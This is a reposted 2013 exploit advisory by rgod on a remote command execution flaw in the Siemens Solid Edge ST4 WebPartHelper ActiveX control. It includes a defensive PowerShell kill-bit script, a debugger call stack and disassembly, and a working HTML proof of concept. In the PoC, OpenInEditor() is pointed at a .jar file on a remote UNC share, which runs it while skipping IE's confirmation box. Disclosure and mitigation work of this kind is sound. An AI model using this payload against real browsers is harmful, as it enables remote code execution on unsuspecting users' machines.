SIEMENS Solid Edge ST4 WebPartHelper ActiveX - RFMSsvs!JShellExecuteEx RCE
Source: vfocus.net   Author: rgod   Published: 2013-05-27

SIEMENS Solid Edge ST4 WebPartHelper ActiveX Control RFMSsvs!JShellExecuteEx Remote Command Execution
 
 Tested against: Microsoft Windows Server 2003 r2 sp2
 Microsoft Windows XP sp3
 Internet Explorer 8
 
 Software description: http://en.wikipedia.org/wiki/Solid_Edge
 
 vendor site: http://www.siemens.com/entry/cc/en/
 
 Download url: http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm
 
 File tested: SolidEdgeV104ENGLISH_32Bit.exe
 
 Background:
 
The software above registers an ActiveX control with
the following settings:
 
 CLSID: {DD568718-FF20-48EA-973F-0BD5C9FCA522}
 Progid: SolidEdge.WebPartHelper.1
 Binary Path: C:\Program Files\Solid Edge ST4\Program\WPHelper.dll
 Implements IObjectSafety: True
 Safe For Initialization (IObjectSafety): False
 Safe For Scripting (IObjectSafety): True
 
This control *implements* IObjectSafety: IE queries it through that
interface for "Safe for Initialization with data" and "Safe for Scripting".

Because the control reports itself Safe for Scripting, IE allows script on a
web page to instantiate it and call its methods, subject to the ActiveX
settings of the zone the page is loaded in.
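As an added check, not part of rgod's advisory: the PowerShell script below looks up the CLSID listed above in the COM registration and in Internet Explorer's "ActiveX Compatibility" key, reports whether the kill bit is set, and with -SetKillBit writes it (Compatibility Flags 0x400, COMPAT_EVIL_DONT_LOAD), which stops IE from instantiating the control regardless of its IObjectSafety answers. The registry locations and flag value are Microsoft's documented ones; the parameter name and messages are assumptions of this example.

```powershell
# Added example, not part of the advisory: audit and (optionally) kill-bit the
# WebPartHelper control. Run in an elevated PowerShell when using -SetKillBit.
param([switch]$SetKillBit)

$clsid       = '{DD568718-FF20-48EA-973F-0BD5C9FCA522}'   # CLSID from the advisory
$killBitFlag = 0x400                                      # COMPAT_EVIL_DONT_LOAD (MS KB240797)

# COM registration of the control; the InprocServer32 default value is the DLL path.
$inprocKey = "HKLM:\SOFTWARE\Classes\CLSID\$clsid\InprocServer32"

# IE reads per-CLSID compatibility flags here. On 64-bit Windows the 32-bit IE
# uses the Wow6432Node copy, so both locations are checked when they exist.
$compatKeys = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid",
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
)

if (Test-Path $inprocKey) {
    $dll = (Get-ItemProperty -Path $inprocKey).'(default)'
    Write-Output "Control $clsid is registered: $dll"
} else {
    Write-Output "Control $clsid is not registered on this host."
}

foreach ($key in $compatKeys) {
    # Skip the Wow6432Node location on 32-bit Windows, where its parent does not exist.
    if (-not (Test-Path (Split-Path -Path $key -Parent))) { continue }

    $flags = 0
    if (Test-Path $key) {
        $item = Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
        if ($null -ne $item) { $flags = [int]$item.'Compatibility Flags' }
    }

    if (($flags -band $killBitFlag) -ne 0) {
        Write-Output ("{0}: kill bit already set (Compatibility Flags = 0x{1:X})" -f $key, $flags)
    } elseif ($SetKillBit) {
        # Keep any flags already present and only add the kill bit.
        $newFlags = $flags -bor $killBitFlag
        New-Item -Path $key -Force | Out-Null
        Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $newFlags -Type DWord
        Write-Output ("{0}: kill bit set (Compatibility Flags = 0x{1:X})" -f $key, $newFlags)
    } else {
        Write-Output "${key}: kill bit NOT set; rerun with -SetKillBit to stop IE from loading the control."
    }
}
```

Setting the kill bit only affects Internet Explorer and other hosts that honour the ActiveX Compatibility key; the DLL stays on disk and remains usable by Solid Edge itself.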
 
 vulnerability:
 
 the WebPartHelper Class offers the OpenInEditor() method, see typelib:
 
 ...
 /* DISPID=8 */
 function OpenInEditor(
 /* VT_VARIANT [12] [in] */ $URL
 )
 {
 }
 ...
 
By passing a UNC path on a null-session share (one reachable without
credentials) as the URL argument of this method, an attacker can launch an
arbitrary executable of their choosing.

This happens because the argument is passed, without validation, to a
ShellExecuteExW() call inside RFMSsvs.dll.
 
 Call stack when ShellExecuteExW() is called:
 
 Address    Stack      Procedure / arguments                 Called from                   Frame
 01B7E140   04AC9F0E   SHELL32.ShellExecuteExW               RFMSsvs.04AC9F08              01B7F280
 01B7F284   022B71AD   ? <jmp.&RFMSsvs.JShellExecuteEx>      WPHelper.022B71A8             01B7F280
 01B7F560   022B85B6   WPHelper.022B6D70                     WPHelper.022B85B1             01B7F55C
 01B7F5D4   022B87A5   ? WPHelper.022B8380                   WPHelper.022B87A0             01B7F5D0
 01B7F620   022B89CB   WPHelper.022B8710                     WPHelper.022B89C6             01B7F61C
 01B7F668   7D0E5186   Includes WPHelper.022B89CB            OLEAUT32.7D0E5184             01B7F664
 01B7F690   7D0F4ACF   ? OLEAUT32.DispCallFunc               OLEAUT32.7D0F4ACA             01B7F68C
 01B7F720   022B58C3   Includes OLEAUT32.7D0F4ACF            WPHelper.022B58C1             01B7F71C
 01B7F748   40302C02   Includes WPHelper.022B58C3            jscript.40302BFF              01B7F744
 01B7F784   40302B6F   jscript.40302B90                      jscript.40302B6A              01B7F780
 01B7F7C0   40302AFA   jscript.40302B2E                      jscript.40302AF5              01B7F7BC
 01B7F834   40303555   ? jscript.40302A88                    jscript.40303550              01B7F830
 01B7F878   40301221   jscript.4030122A                      jscript.4030121C              01B7F874
 01B7F8B8   403011D6   jscript.403011E1                      jscript.403011D1              01B7F8B4
 01B7F8DC   4030312D   jscript.40301182                      jscript.40303128              01B7F8D8
 
 
 WPHelper.dll:
 ...
 022B718A   899D 74FDFFFF    mov dword ptr ss:[ebp-28C],ebx
 022B7190   8D85 D8FDFFFF    lea eax,dword ptr ss:[ebp-228]
 022B7196   50               push eax
 022B7197   8D8D 60FDFFFF    lea ecx,dword ptr ss:[ebp-2A0]
 022B719D   51               push ecx
 022B719E   C785 7CFDFFFF 01>mov dword ptr ss:[ebp-284],1
 022B71A8   E8 ADBB0100      call <jmp.&RFMSsvs.JShellExecuteEx>
 ...
 
 
 RFMSsvs.dll:
 ...
 04AC9ECF   8B85 A4EFFFFF    mov eax,dword ptr ss:[ebp-105C]
 04AC9ED5   8D8D 4CEFFFFF    lea ecx,dword ptr ss:[ebp-10B4]
 04AC9EDB   8946 24          mov dword ptr ds:[esi+24],eax
 04AC9EDE   FF15 0CE3CB04    call dword ptr ds:[<&JUtil.??BGUserText@@QBEPB_WXZ>]                    ; JUtil.??BGUserText@@QBEPB_WXZ
 04AC9EE4   8946 10          mov dword ptr ds:[esi+10],eax
 04AC9EE7   C645 FC 02       mov byte ptr ss:[ebp-4],2
 04AC9EEB   8D8D D8EEFFFF    lea ecx,dword ptr ss:[ebp-1128]
 04AC9EF1   E8 6A89F1FF      call RFMSsvs.??1JrfmsFileName@@QAE@XZ
 04AC9EF6   EB 0F            jmp short RFMSsvs.04AC9F07
 04AC9EF8   8D8D 84EFFFFF    lea ecx,dword ptr ss:[ebp-107C]
 04AC9EFE   FF15 0CE3CB04    call dword ptr ds:[<&JUtil.??BGUserText@@QBEPB_WXZ>]                    ; JUtil.??BGUserText@@QBEPB_WXZ
 04AC9F04   8946 10          mov dword ptr ds:[esi+10],eax        ; eax -> "\\192.168.2.100\uncshare\CmdExec.jar"
 04AC9F07   56               push esi
 04AC9F08   FF15 E8E6CB04    call dword ptr ds:[<&SHELL32.ShellExecuteExW>]                          ; SHELL32.ShellExecuteExW
 ...
 
Proof-of-concept code follows.
Note that by pointing OpenInEditor() (and consequently ShellExecuteExW())
at a remote .jar file, which is handed to the JRE/JDK (7u21 at the time of
testing), the usual open-file confirmation box is bypassed.
 
 <!--
 SIEMENS Solid Edge WebPartHelper ActiveX Control RFMSsvs!JShellExecuteEx
 Remote Command Execution PoC
 
 CLSID: {DD568718-FF20-48EA-973F-0BD5C9FCA522}
 Progid: SolidEdge.WebPartHelper.1
 Binary Path: C:\Program Files\Solid Edge ST4\Program\WPHelper.dll
 Implements IObjectSafety: True
 Safe For Initialization (IObjectSafety): False
 Safe For Scripting (IObjectSafety): True
 -->
 <!-- saved from url=(0014)about:internet -->
 <html>
 <script>
 
 var obj = new ActiveXObject("SolidEdge.WebPartHelper.1");
 
 //launch calc.exe
 //obj.OpenInEditor("c:\\windows\\system32\\calc.exe");
 
 //bypass the confirmation box, JRE/JDK7u21
 obj.OpenInEditor("\\\\192.168.0.1\\uncshare\\CmdExec.jar");
 
 
</script>
</html>